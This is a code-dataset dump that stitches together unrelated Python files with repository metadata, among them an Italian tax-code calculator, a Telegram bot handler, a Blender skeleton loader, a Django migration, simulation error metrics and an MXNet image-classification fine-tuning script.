return alfabeto[resto]
def codice_fiscale(cognome, nome, nascita, sesso, stato, provincia, comune, db):
"""Restituisce il codice fiscale a partire dai dati anagrafici.
Solleva InvalidDataError se nome o cognome contengono caratteri non ammessi.
@type cognome: unicode
@type nome: unicode
@type nascita: datetime.date
@param db: un callable che restituisce il codice del comume di nascita
(pescandolo da un db o altro storage). La signature deve essere
db(stato, provincia, comune).
"""
codice = (codice_cognome(cognome) +
codice_nome(nome) +
codice_nascita(nascita, sesso) +
codice_geografia(stato, provincia, comune, db))
return codice + codice_controllo(codice)
if __name__ == '__main__':
# una piccola interfaccia testuale per giocare un po'...
import sys
import db
try:
con = db.Connessione()
except:
raw_input('Problema con il database... Invio per terminare.')
sys.exit(1)
enc = sys.stdin.encoding
sep = '\n' + '='*30 + '\n\n'
print 'CALCOLO DEL CODICE FISCALE\n\n'
while True:
if raw_input('Vuoi calcolare un CF? (s/n)') != 's': break
nome = raw_input('Nome? ').strip().decode(enc)
cognome = raw_input('Cognome? ').strip().decode(enc)
sesso = raw_input('Sesso? (m/f) ').strip()
giorno = raw_input('Giorno di nascita? ').strip()
mese = raw_input('Mese di nascita? ').strip()
anno = raw_input('Anno di nascita? ').strip()
stato = raw_input('Stato di nascita? ').strip().upper().decode(enc)
provincia = raw_input('Prov. di nascita? ').strip().upper().decode(enc)
comune = raw_input('Comune di nascita? ').strip().upper().decode(enc)
try:
nascita = date(int(anno), int(mese), int(giorno))
except ValueError:
print 'Data di nascita non valida.', sep
continue
try:
cod = codice_fiscale(cognome, nome, nascita,
sesso, stato, provincia, comune,
con.codici_geografici)
print 'CF: ', cod, sep
except InvalidDataError:
print 'Nome o cognome contengono caratteri non validi.', sep
except db.DBQueryError:
print 'Ci sono problemi con la query del database.', sep
except db.DBNoDataError:
print 'Non esiste un codice per il comune/stato immesso.', sep
| [
"ric.pol@libero.it"
] | ric.pol@libero.it |
5088d1c8efb01a00cf118d5caacaf7548139aafd | 258fccefe5cb77d07f6019179499a2a8b3b783c8 | /start.py | 5989b3f1e2e654cc8bd1c898441bdd9410d40dfe | [] | no_license | mouryachandra53/youtubemourya | ead7b397d1447a25edbd9bf5b0d58b276907080e | e49dc9a754b3950d428e2ccb3e3046e233bb1d31 | refs/heads/main | 2023-03-03T12:33:06.305226 | 2021-02-16T11:48:02 | 2021-02-16T11:48:02 | 339,379,827 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 591 | py | from pyrogram import Client, Filters, StopPropagation, InlineKeyboardButton, InlineKeyboardMarkup
@Client.on_message(Filters.command(["start"]), group=-2)
async def start(client, message):
# return
joinButton = InlineKeyboardMarkup([
[InlineKeyboardButton("Movies", url="https://t.me/Mouryac_bot")],
[InlineKeyboardButton(
"Report Bugs 😊", url="https://t.me/IAmMourya8")]
])
welcomed = f"Hey <b>{message.from_user.first_name}</b>\n/help for More info"
await message.reply_text(welcomed, reply_markup=joinButton)
raise StopPropagation
| [
"noreply@github.com"
] | mouryachandra53.noreply@github.com |
238fc407890727201e1ced9c07aac1eef3dae941 | 5d6245b59dd89da69accc58c82b4b9bde2ef7147 | /GUI/timer.py | 1e6e784d766c60599edf8d09686989f492408c3b | [] | no_license | ksakkas/Learn-Python | c105e68eec8594f934c6fafd15b39b99c4abf886 | 99983ef61f7225596f3122a8d1b43d01ec4d0b64 | refs/heads/master | 2023-01-11T22:31:17.810297 | 2020-10-18T07:32:52 | 2020-10-18T07:32:52 | 295,176,499 | 1 | 0 | null | 2020-09-13T19:09:05 | 2020-09-13T15:09:43 | Python | UTF-8 | Python | false | false | 280 | py | from tkinter import *
root = Tk()
minutes = Label(root, text="Λεπτά:")
minutes.pack(side=LEFT)
scale = Scale(root, from_=1, to=20, orient=HORIZONTAL, length=500)
scale.pack()
button = Button(root, text="Ξεκίνα τώρα", command=quit)
button.pack()
root.mainloop() | [
"ksakkasuoi@gmail.com"
] | ksakkasuoi@gmail.com |
9e61572f67d50a39de89d854f9fd2e9bd849f154 | c475cd8531a94ffae69cc92371d41531dbbddb6c | /Data/BlenderScript/2.71/test.py | 2d32dfe6ae7a6f0117bddb54cc8ce04b69e69456 | [
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] | permissive | WolfireGames/overgrowth | 72d3dd29cbd7254337265c29f8de3e5c32400114 | 594a2a4f9da0855304ee8cd5335d042f8e954ce1 | refs/heads/main | 2023-08-15T19:36:56.156578 | 2023-05-17T08:17:53 | 2023-05-17T08:20:36 | 467,448,492 | 2,264 | 245 | Apache-2.0 | 2023-05-09T07:29:58 | 2022-03-08T09:38:54 | C++ | UTF-8 | Python | false | false | 3,371 | py | import bpy
from xml.etree import cElementTree as ET
print("\nRunning character loader:")
working_dir = "C:/Users/David/Desktop/WolfireSVN/"
actor_xml_path = working_dir + 'Data/Objects/IGF_Characters/IGF_GuardActor.xml'
print("Loading actor file: "+actor_xml_path)
xml_root = ET.parse(actor_xml_path).getroot()
character_xml_path = None
for element in xml_root:
if element.tag == "Character":
character_xml_path = element.text
object_xml_path = None
skeleton_xml_path = None
if character_xml_path:
print("Loading character file: "+working_dir+character_xml_path)
xml_root = ET.parse(working_dir+character_xml_path).getroot()
for element in xml_root:
if(element.tag == "appearance"):
object_xml_path = element.get("obj_path")
skeleton_xml_path = element.get("skeleton")
model_path = None
color_path = None
normal_path = None
palette_map_path = None
shader_name = None
if object_xml_path:
print("Loading object file: "+working_dir+object_xml_path)
xml_root = ET.parse(working_dir+object_xml_path).getroot()
for element in xml_root:
if(element.tag == "Model"):
model_path = element.text
if(element.tag == "ColorMap"):
color_path = element.text
if(element.tag == "NormalMap"):
normal_path = element.text
if(element.tag == "PaletteMap"):
palette_map_path = element.text
if(element.tag == "ShaderName"):
shader_name = element.text
bone_path = None
if skeleton_xml_path:
print("Loading skeleton file: "+working_dir+skeleton_xml_path)
xml_root = ET.parse(working_dir+skeleton_xml_path).getroot()
print(xml_root)
model_path = xml_root.get("model_path")
bone_path = xml_root.get("bone_path")
'''if model_path:
print("Model path: "+working_dir+model_path)
bpy.ops.import_scene.obj(filepath=(working_dir+model_path))
'''
_min_skeleton_version = 6
import struct
if bone_path:
print("Bone path: "+working_dir+bone_path)
with open(working_dir+bone_path, mode='rb') as file:
contents = file.read()
file.close()
cursor = 0;
temp_read = struct.unpack("i", contents[cursor:cursor+4])
cursor += 4
version = 5
if temp_read[0] >= _min_skeleton_version:
version = temp_read[0];
temp_read = struct.unpack("i", contents[cursor:cursor+4])
cursor += 4
print("Version: "+str(version))
print("Rigging stage: "+str(temp_read[0]))
num_points = struct.unpack("i", contents[cursor:cursor+4])[0]
cursor += 4
print("Num points: "+str(num_points))
points = []
for i in range(0, num_points):
points += struct.unpack("fff", contents[cursor:cursor+12])
cursor += 12
point_parents = []
if version >= 8:
for i in range(0, num_points):
point_parents += struct.unpack("i", contents[cursor:cursor+4])
cursor += 4
num_bones = struct.unpack("i", contents[cursor:cursor+4])[0]
cursor += 4
print("Num bones: "+str(num_bones))
bone_ends = []
bone_mats = []
for i in range(0, num_bones):
bone_ends += struct.unpack("ii", contents[cursor:cursor+8])
cursor += 8
print(bone_ends) | [
"max@autious.net"
] | max@autious.net |
7690187092e10418ab3660f7a4c9a7d27f10692d | 807dc5d1c596cc0961fb18396890fd8dc1049372 | /nanoHUB-binary-mixture-cyclic-peptides/.svn/text-base/Process_COM.py.svn-base | c7f5405154fac581360e058f4678ea325a590e71 | [] | no_license | matthewjsullivan1/code-samples-matthew-sullivan | b9916030911e4f9b4663316c78b672bde2de9360 | f9dcab057182a87f192fc5c14d4add9baccc6cc1 | refs/heads/master | 2021-01-20T08:54:37.314931 | 2017-11-11T03:41:03 | 2017-11-11T03:41:03 | 90,200,808 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,210 | from numpy import *
import math
from Options import Options
class Process_COM:
def __init__(self, input):
options = Options()
self.input_ = input
self.nummol_ = options.numunits_
self.xcoord_ = []
self.ycoord_ = []
self.zcoord_ = []
self.adjmatrix_ = zeros((self.nummol_,self.nummol_))
self.cutoff_ = 7.53
self.lengthlist_ = []
self.options_ = options
def _Readcoords(self):
self.xcoord_ = []
self.ycoord_ = []
self.zcoord_ = []
line = self.input_.readline().split()
cond = str(self.nummol_) not in line
while cond:
line = self.input_.readline().split()
cond = str(self.nummol_) not in line
for ii in range(self.nummol_):
line = self.input_.readline().split()
self.xcoord_.append(float(line[1]))
self.ycoord_.append(float(line[2]))
self.zcoord_.append(float(line[3]))
def AreBonded(self, ind1, ind2):
if ind1 == ind2:
return False
else:
coor1_ = [self.xcoord_[ind1], self.ycoord_[ind1], self.zcoord_[ind1]]
coor2_ = [self.xcoord_[ind2], self.ycoord_[ind2], self.zcoord_[ind2]]
width = [self.options_.box_[1] - self.options_.box_[0],
self.options_.box_[3] - self.options_.box_[2],
self.options_.box_[5] - self.options_.box_[4]]
incr = [math.fabs(coor1_[0] - coor2_[0]),
math.fabs(coor1_[1] - coor2_[1]),
math.fabs(coor1_[2] - coor2_[2])]
for ii in range(len(incr)):
if incr[ii] > 0.5 * width[ii]:
incr[ii] = width[ii] - incr[ii]
dist = math.sqrt(incr[0]**2 + incr[1]**2 +incr[2]**2)
return dist <= self.cutoff_
def _Filladjmatrix(self):
for ii in range(self.nummol_):
for jj in range(self.nummol_):
self.adjmatrix_[ii, jj] = self.AreBonded(ii,jj)
def Neighbors(self, ID):
set = []
for ii in range(self.nummol_):
if ii != ID and self.adjmatrix_[ID][ii]:
set.append(ii)
return set
def Complength(self, ID, countedlist, length):
try:
countedlist.index(ID)
NotInvestigated = False
except ValueError:
NotInvestigated = True
if NotInvestigated:
Bondedmols = self.Neighbors(ID)
countedlist.append(ID)
length += 1
for mols in Bondedmols:
countedlist, length = self.Complength(mols, countedlist,
length)
return countedlist, length
else:
return countedlist, length
def _Createlengthlist(self):
countedlist = []
self.lengthlist_ = []
for ii in range(self.nummol_):
countedlist, length = self.Complength(ii, countedlist, 0)
if length != 0:
self.lengthlist_.append(length)
def _Lengthhisto(self):
Histo = [0, 0, 0, 0, 0]
for ii in self.lengthlist_:
if ii > 0 and ii <= 2: Histo[0] += 1
elif ii > 2 and ii <= 4: Histo [1] += 1
elif ii > 4 and ii <= 6: Histo [2] += 1
elif ii > 6 and ii <= 8: Histo [3] += 1
elif ii > 8: Histo[4] += 1
output = []
categ = ["1-2", "3-4", "5-6", "7-8", "8- "]
for jj in range(len(Histo)):
output.append("%s %d" % (categ[jj], Histo[jj]))
return "\n".join(output)
def Execute(self):
self._Readcoords()
self._Filladjmatrix()
self._Createlengthlist()
return self._Lengthhisto()
def Interfaceshisto(self):
categ = ["RedtoRed", "RedtoBlue", "BluetoBlue"]
Histo = [0, 0, 0]
unittype = self.options_.unittype_
for ii in range(self.adjmatrix_.shape[0]):
for jj in range(self.adjmatrix_.shape[1]):
if self.adjmatrix_[ii, jj] == 1 and ii > jj:
if unittype[ii] == 1 and unittype[jj] == 1:
Histo[0] += 1
elif unittype[ii] != unittype[jj]:
Histo[1] += 1
elif unittype[ii] == 3 and unittype[jj] == 3:
Histo[2] += 1
output = []
for jj in range(len(Histo)):
output.append("%s %d" % (categ[jj], Histo[jj]))
return "\n".join(output)
def Averagelength(self):
sum = 0.0
count = 0.0
for ii in self.lengthlist_:
sum += ii
count += 1
if count == 0:
return 1
else:
return (sum / count)
#input = open("com.txt", 'r')
#opt = Options()
#opt.box = [0, 50, 0, 50, 0, 50]
#obj = ProcessCOM(input, 10, opt)
#for ii in range(11):
# obj.Execute()
# print obj.xcoord_
# print obj.ycoord_
# print obj.zcoord_
# print obj.lengthlist_
# print obj.options_.box_
# print obj.AverageLength()
# print obj.adjmatrix_
#input.close()
| [
"matthew.j.sullivan1@gmail.com"
] | matthew.j.sullivan1@gmail.com | |
5c91849062e2885f85a53812bea5f5ceee70b1f8 | 9e19dbd7edbd7112b1fb6e7205d74b8d2f861b29 | /blog/migrations/0003_post_postcomment.py | fce2d4561b02bb856240e05b8227a2ef06dcefdb | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | mkdika/pyniblog | 759029e5f56a947659caf72b5155bc4f60c655b0 | 0612836f7c91076a386d5d64ae22cc4fe9443964 | refs/heads/master | 2022-12-15T06:26:47.410114 | 2018-12-17T08:42:28 | 2018-12-17T08:42:28 | 144,513,321 | 1 | 0 | Apache-2.0 | 2022-12-08T02:46:23 | 2018-08-13T01:08:18 | JavaScript | UTF-8 | Python | false | false | 1,774 | py | # Generated by Django 2.1 on 2018-08-13 02:08
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('blog', '0002_tag'),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('permalink', models.CharField(max_length=255, unique=True)),
('title', models.CharField(max_length=255)),
('post_date', models.DateTimeField()),
('post_body', models.TextField()),
('release', models.BooleanField(default=False)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='blog.Category')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'tb_post',
},
),
migrations.CreateModel(
name='PostComment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('email', models.CharField(max_length=100)),
('comment_body', models.TextField()),
('Post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Post')),
],
options={
'db_table': 'tb_post_comment',
},
),
]
| [
"mkdika@gmail.com"
] | mkdika@gmail.com |
5f370ef2e31dbd11f883fa883d71fbb1f8e88af7 | 751f0641c2896f554be4556a38c0e63a56fc3409 | /outputanalysis/CalculateDiagnostics.py | ddb1981b4c8e7bc5d1904a336ef584dc10f249a3 | [
"BSD-3-Clause"
] | permissive | selvex/flee-vis | 46faaa1f0daa846922b52b40167a33177c140a7d | 4728063ddd82602538356bc9bdb700658737920b | refs/heads/develop | 2020-05-02T07:43:29.311311 | 2019-05-07T12:32:33 | 2019-05-07T12:33:07 | 177,825,503 | 1 | 0 | BSD-3-Clause | 2019-05-07T12:35:37 | 2019-03-26T16:14:56 | Python | UTF-8 | Python | false | false | 2,712 | py | import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import StoreDiagnostics as dd
import analysis as a
def calculate_errors(out_dir, data, name, naieve_model=True):
"""
Advanced plotting function for validation of refugee registration numbers in camps.
"""
plt.clf()
# data.loc[:,["%s sim" % name,"%s data" % name]]).as_matrix()
y1 = data["%s sim" % name].as_matrix()
y2 = data["%s data" % name].as_matrix()
days = np.arange(len(y1))
naieve_early_day = 7
naieve_training_day = 30
# Rescaled values
plt.clf()
plt.xlabel("Days elapsed")
plt.ylabel("Number of refugees")
simtot = data["refugees in camps (simulation)"].as_matrix().flatten()
untot = data["refugees in camps (UNHCR)"].as_matrix().flatten()
y1_rescaled = np.zeros(len(y1))
for i in range(0, len(y1_rescaled)):
# Only rescale if simtot > 0
if simtot[i] > 0:
y1_rescaled[i] = y1[i] * untot[i] / simtot[i]
"""
Error quantification phase:
- Quantify the errors and mismatches for this camp.
"""
lerr = dd.LocationErrors()
# absolute difference
lerr.errors["absolute difference"] = a.abs_diffs(y1, y2)
# absolute difference (rescaled)
lerr.errors["absolute difference rescaled"] = a.abs_diffs(y1_rescaled, y2)
# ratio difference
lerr.errors["ratio difference"] = a.abs_diffs(y1, y2) / (np.maximum(untot, np.ones(len(untot))))
""" Errors of which I'm usure whether to report:
- accuracy ratio (forecast / true value), because it crashes if denominator is 0.
- ln(accuracy ratio).
"""
# We can only calculate the Mean Absolute Scaled Error if we have a naieve model in our plot.
if naieve_model:
# Number of observations (aggrgate refugee days in UNHCR data set for this location)
lerr.errors["N"] = np.sum(y2)
# flat naieve model (7 day)
lerr.errors["MASE7"] = a.calculate_MASE(y1_rescaled, y2, n1, naieve_early_day)
lerr.errors["MASE7-sloped"] = a.calculate_MASE(y1_rescaled, y2, n3, naieve_early_day)
lerr.errors["MASE7-ratio"] = a.calculate_MASE(y1_rescaled, y2, n5, naieve_early_day)
# flat naieve model (30 day)
lerr.errors["MASE30"] = a.calculate_MASE(y1_rescaled, y2, n2, naieve_training_day)
lerr.errors["MASE30-sloped"] = a.calculate_MASE(y1_rescaled, y2, n4, naieve_training_day)
lerr.errors["MASE30-ratio"] = a.calculate_MASE(y1_rescaled, y2, n6, naieve_training_day)
# Accuracy ratio doesn't work because of 0 values in the data.
print("%s,%s,%s,%s,%s,%s,%s,%s,%s" % (out_dir, name, lerr.errors["MASE7"],lerr.errors["MASE7-sloped"], lerr.errors["MASE7-ratio"],lerr.errors["MASE30"],lerr.errors["MASE30-sloped"],lerr.errors["MASE30-ratio"],lerr.errors["N"]))
return lerr
| [
"djgroennl@gmail.com"
] | djgroennl@gmail.com |
5591cd156705758799a5e27fba12236c37d50142 | 2d575cd9beed6840de0ca787134354bb2511e44f | /tf_based/snml/np_based/test_multiprocessing.py | 823a89d948a24bf43002d2a1bbcc7753c8dba6d6 | [] | no_license | truythu169/snml-skip-gram | b949fdb35c6ed89364a8253025f41c7df85f4e7e | 02ff190a256724cbd5b656d7ea1cb235abb08863 | refs/heads/master | 2023-04-16T13:55:17.409637 | 2020-06-18T09:52:44 | 2020-06-18T09:52:44 | 210,846,786 | 1 | 0 | null | 2023-03-24T22:09:21 | 2019-09-25T13:03:20 | Python | UTF-8 | Python | false | false | 919 | py | from tf_based.snml.np_based.model import Model
from sklearn.metrics import mean_absolute_error
import time
if __name__ == "__main__":
model = Model('../models/100dim/',
'../context_distribution.pkl')
start = time.time()
snml_length, probs1 = model.snml_length_sampling_multiprocess(8229, 9023, epochs=31, neg_size=3000,
n_context_sample=600)
end = time.time()
print("Multiprocessing in {:.4f} sec".format(end - start))
print(snml_length)
start = time.time()
snml_length, probs2 = model.snml_length_sampling(8229, 9023, epochs=31, neg_size=3000, n_context_sample=600)
end = time.time()
print("Single process in {:.4f} sec".format(end - start))
print(snml_length)
# for i in range(len(probs1)):
# print(probs1[i], probs2[i])
print(mean_absolute_error(probs1, probs2))
| [
"hungpt169@gmail.com"
] | hungpt169@gmail.com |
76b75d6c6af4e2442a42808f2d9ff9b81eda8e17 | 1a12844079c3e39f071f2ec18d3a8e024c47bbde | /3_extract_hw/classifier_fcnn.py | cc5b9e06a3f648d4618118ed0ca7b2ab856ef370 | [] | no_license | psengeis/master_thesis_evaluation | 7c3bd3aa2b34ad4704deedef121a17d71a187867 | 836be58e6443579b95bee2ec2655d8e45163f35d | refs/heads/master | 2023-04-12T06:32:52.344485 | 2021-05-04T01:51:17 | 2021-05-04T01:51:17 | 363,448,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,062 | py | '''
This file can be used to test the models on input images. It includes features such as
1) Enabling CRF postprocessing
2) Enabling visualisations
3) Mean IoU calculations if a GT image is provided.
Run python 'classifier_fcnn.py -h' for more information
'''
import os
import argparse
import sys
import warnings
import cv2
from pathlib import Path
# import matplotlib.pyplot as plt
import numpy as np
import skimage.io as io
from fcn_helper_function import weighted_categorical_crossentropy, IoU
from img_utils import getbinim, max_rgb_filter, get_IoU, getBinclassImg, mask2rgb, rgb2mask
from keras.engine.saving import load_model
from post import crf
from skimage import img_as_float
from skimage.color import gray2rgb
if not sys.warnoptions:
warnings.simplefilter("ignore")
# needed, as gpu to less memory...
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
BOXWDITH = 256
STRIDE = BOXWDITH - 10
ROOT = Path(__file__).parent.absolute()
# model = None
def classify(image):
# global model
# if model is None:
model = load_model(str(Path(ROOT, 'models/fcnn_bin.h5')), custom_objects={
'loss': weighted_categorical_crossentropy([0.4, 0.5, 0.1]), 'IoU': IoU})
orgim = np.copy(image)
image = img_as_float(gray2rgb(getbinim(image)))
maskw = int((np.ceil(image.shape[1] / BOXWDITH) * BOXWDITH)) + 1
maskh = int((np.ceil(image.shape[0] / BOXWDITH) * BOXWDITH))
mask = np.ones((maskh, maskw, 3))
mask2 = np.zeros((maskh, maskw, 3))
mask[0:image.shape[0], 0:image.shape[1]] = image
# print("classifying image...")
for y in range(0, mask.shape[0], STRIDE):
x = 0
if (y + BOXWDITH > mask.shape[0]):
break
while (x + BOXWDITH) < mask.shape[1]:
input = mask[y:y+BOXWDITH, x:x+BOXWDITH]
std = input.std() if input.std() != 0 else 1
mean = input.mean()
mask2[y:y+BOXWDITH, x:x+BOXWDITH] = model.predict(
np.array([(input-mean)/std]))[0]
x = x + STRIDE
return mask2[0:image.shape[0], 0:image.shape[1]]
def normalize(img):
normalizedImg = cv2.normalize(img, np.zeros(img.shape[:2]), 0, 255, cv2.NORM_MINMAX)
return normalizedImg
def tests(img):
initial = img.copy()
tested = normalize(img)
cv2.imshow('initial', initial)
cv2.imshow('tested', tested)
cv2.waitKey()
cv2.destroyAllWindows()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--enableCRF", help="Use crf for postprocessing", action="store_true")
parser.add_argument(
"--input_image", help="input image file name", required=False)
parser.add_argument(
"--input_folder", help="input folder", required=False)
args = parser.parse_args()
images = None
if args.input_image is not None:
path = Path(args.input_image)
assert path.is_file()
images = [path]
elif args.input_folder is not None:
path = Path(args.input_folder)
assert path.is_dir()
images = path.glob('**/*.*')
assert images is not None
for img_path in images:
# initial_img = io.imread(str(img_path))
initial_img = cv2.imread(str(img_path))
initial_img = normalize(initial_img)
# tests(initial_img)
# continue
five_percent_height = int(initial_img.shape[0]/20)
five_percent_width = int(initial_img.shape[1]/20)
# take a selection of the image, if known where to search for
# initial_img = initial_img[five_percent_height * 7:five_percent_height * 11,
# 0:five_percent_width * 12,
# :]
initial_img = np.ascontiguousarray(initial_img)
# calculate scaling if needed - otherwise no upscale
img_scale = min(
1, min((1200/initial_img.shape[0]), (800/initial_img.shape[1])))
classified = classify(initial_img)
if args.enableCRF:
crf_result = crf(initial_img, classified)
else:
crf_result = None
if args.enableCRF:
handwriting_mask = np.zeros((crf_result.shape))
handwriting_mask[:, :][np.where(
(crf_result[:, :] == [0, 0, 2]).all(axis=2))] = [0, 1, 0]
handwriting_mask = cv2.resize(handwriting_mask, None,
fx=img_scale, fy=img_scale)
cv2.imshow('handwriting?', handwriting_mask)
init_shrink = cv2.resize(initial_img, None,
fx=img_scale, fy=img_scale)
fcn_shrink = cv2.resize(max_rgb_filter(classified), None,
fx=img_scale, fy=img_scale)
cv2.imshow('1', init_shrink)
cv2.imshow('2', fcn_shrink)
if args.enableCRF:
crf_shrink = cv2.resize(crf_result, None,
fx=img_scale, fy=img_scale)
cv2.imshow('3', mask2rgb(crf_shrink))
cv2.waitKey()
cv2.destroyAllWindows()
| [
"51302314+psengeis@users.noreply.github.com"
] | 51302314+psengeis@users.noreply.github.com |
52d448c05743fb7b9866e03a1b84835b435faaa3 | dd7d8722f9b0bcba72f65e543d6d053c803fead1 | /homework/AI2/ExpertSystem.py | ffca24b58ca37bf36e6731262673b2296eec246d | [] | no_license | bharatgupta77/sharad | 4079f56446952653412e767c48cdaf5507ab3704 | 88cb63789be37415dab26721a45fa92458a4d58e | refs/heads/master | 2020-08-26T19:33:31.159526 | 2019-10-23T18:32:59 | 2019-10-23T18:32:59 | 217,122,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,505 | py | import sys
fileName = sys.argv[1]
symptomDictionary = {}
symptomToDiseaseMap = {}
diseaseMatch = {}
def read(dataFileName=fileName):
dataFile = open(dataFileName, 'r')
for line in dataFile:
tokens = line.split(',')
#print(tokens)
symptomsList = []
k=len(tokens[0])
diseaseName = tokens[0][1:k-1]
#print(diseaseName)
symptomCount = len(tokens)
for index in range(1, symptomCount):
symptom = tokens[index].strip()
symptomsList.append(symptom)
#symptomsList.append(tokens[index])
symptomDictionary[diseaseName] = symptomsList
print(symptomDictionary)
def detectDisease():
symptoms = input('Enter the symptoms(comma seperated): : ')
symptomList = symptoms.split(',')
inputSize = len(symptomList)
for index in range(0, inputSize):
symptomList[index] = symptomList[index].strip().lower()
print('The given symptoms are: : ', symptomList)
totalCount = 0.0
for disease in symptomDictionary.keys():
count = 0.0
symptoms = symptomDictionary[disease]
for symptom in symptomList:
if symptom in symptoms:
count += 1
if count > 0:
totalCount += count
diseaseMatch[disease] = count
for key, value in (diseaseMatch.items()):
print('The possibility of having %s is %.2f %%' % (key, (value * 100)/totalCount))
read(fileName)
detectDisease()
| [
"piyush.chincholikar@gmail.com"
] | piyush.chincholikar@gmail.com |
12983b72754b482a37683f20711503f48106a09e | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/space-age/f673f9841b2949e0bd7dc80660c25315.py | 09e50b752cffa3b31a4b4ab1a1dc94f6af4c492a | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 933 | py | from math import floor
class SpaceAge:
def __init__(self, seconds: float) -> None:
self.seconds = seconds
def on_earth(self) -> float:
return round(self.seconds / 31557600, 2)
def on_mercury(self) -> float:
return round(self.on_earth() / 0.2408467, 2)
def on_venus(self) -> float:
# return round(self.on_earth() / 0.61519726, 2)
# TODO: fix precision error in unittest
return floor(self.on_earth() / 0.61519726 * 100) / 100
def on_mars(self) -> float:
return round(self.on_earth() / 1.8808158, 2)
def on_jupiter(self) -> float:
return round(self.on_earth() / 11.862615, 2)
def on_saturn(self) -> float:
return round(self.on_earth() / 29.447498, 2)
def on_uranus(self) -> float:
return round(self.on_earth() / 84.016846, 2)
def on_neptune(self) -> float:
return round(self.on_earth() / 164.79132, 2)
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
767974b507952de8497fd8484519d00a8b1e5f03 | 41fff566fc5486e9d928cc8ace95a86c85716661 | /train-code/.ipynb_checkpoints/trainFloat16-checkpoint.py | 18f73bb8d981340795586873831377327c7f877a | [] | no_license | CeciliaPYY/testFloat16 | 1da8a2e22f097ca650277b0f558db17c1c263a53 | eb621a5547d3d6b911d0bdae10cdb7bc3532c838 | refs/heads/master | 2020-04-07T16:42:20.148655 | 2018-11-21T11:48:10 | 2018-11-21T11:48:10 | 158,539,650 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,960 | py | import mxnet as mx
import numpy as np
import os, time, shutil
from mxnet import gluon, image, init, nd
from mxnet import autograd as ag
from mxnet.gluon import nn
from mxnet.gluon.data.vision import transforms
from gluoncv.utils import makedirs
from gluoncv.model_zoo import get_model
# 分割一下数据集~
# imglist = os.listdir("./classified-images/normal/") + os.listdir("./classified-images/terror/")
# trainPlusValNum = (terrorNum + normalNum)*0.7 # 8117
# testNum = (terrorNum + normalNum)*0.3 # 3479
# normalNum = 1335
# terrorNum = 10261
# set some parameters
classes = 2
epochs = 40
lr = 0.001
per_device_batch_size = 256
momentum = 0.9
wd = 0.0001
lr_factor = 0.75
lr_steps = [10, 20, 30, np.inf]
num_gpus = 1
num_workers = 8
ctx = [mx.gpu(i) for i in range(num_gpus)] if num_gpus > 0 else [mx.cpu()]
batch_size = per_device_batch_size * max(num_gpus, 1)
# data augmentation
jitter_param = 0.4
lighting_param = 0.1
transform_train = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomFlipLeftRight(),
transforms.RandomColorJitter(brightness=jitter_param, contrast=jitter_param,
saturation=jitter_param),
transforms.RandomLighting(lighting_param),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
transform_test = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
# define dataloader
from mxnet.gluon.data.vision import ImageFolderDataset
import cv2
class BKData(ImageFolderDataset):
def __init__(self, *arg1, **arg2):
super(BKData,self).__init__(*arg1,**arg2)
def __getitem__(self, idx):
'''
use cv2 backend
'''
img = cv2.imread(self.items[idx][0])
img = nd.array( img[:,:,:3]).astype(np.uint8)
label = self.items[idx][1]
if self._transform is not None:
return self._transform(img, label)
return img, label
path = './images'
train_path = os.path.join(path, 'train')
val_path = os.path.join(path, 'val')
test_path = os.path.join(path, 'test')
train_data = gluon.data.DataLoader(
BKData(train_path).transform_first(transform_train),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
val_data = gluon.data.DataLoader(
BKData(val_path).transform_first(transform_test),
batch_size=batch_size, shuffle=False, num_workers = num_workers)
test_data = gluon.data.DataLoader(
BKData(test_path).transform_first(transform_test),
batch_size=batch_size, shuffle=False, num_workers = num_workers)
# model and trainer
model_name = 'ResNet50_v2'
finetune_net = get_model(model_name, pretrained=True)
with finetune_net.name_scope():
finetune_net.output = nn.Dense(classes)
finetune_net.output.initialize(init.Xavier(), ctx = ctx)
finetune_net.collect_params().reset_ctx(ctx)
finetune_net.hybridize()
trainer = gluon.Trainer(finetune_net.collect_params(), 'sgd', {
'learning_rate': lr, 'momentum': momentum, 'wd': wd})
metric = mx.metric.Accuracy()
L = gluon.loss.SoftmaxCrossEntropyLoss()
# define test
def test(net, val_data, ctx):
metric = mx.metric.Accuracy()
for i, batch in enumerate(val_data):
data = gluon.utils.split_and_load(batch[0], ctx_list=ctx, batch_axis=0, even_split=False)
label = gluon.utils.split_and_load(batch[1], ctx_list=ctx, batch_axis=0, even_split=False)
outputs = [net(X) for X in data]
metric.update(label, outputs)
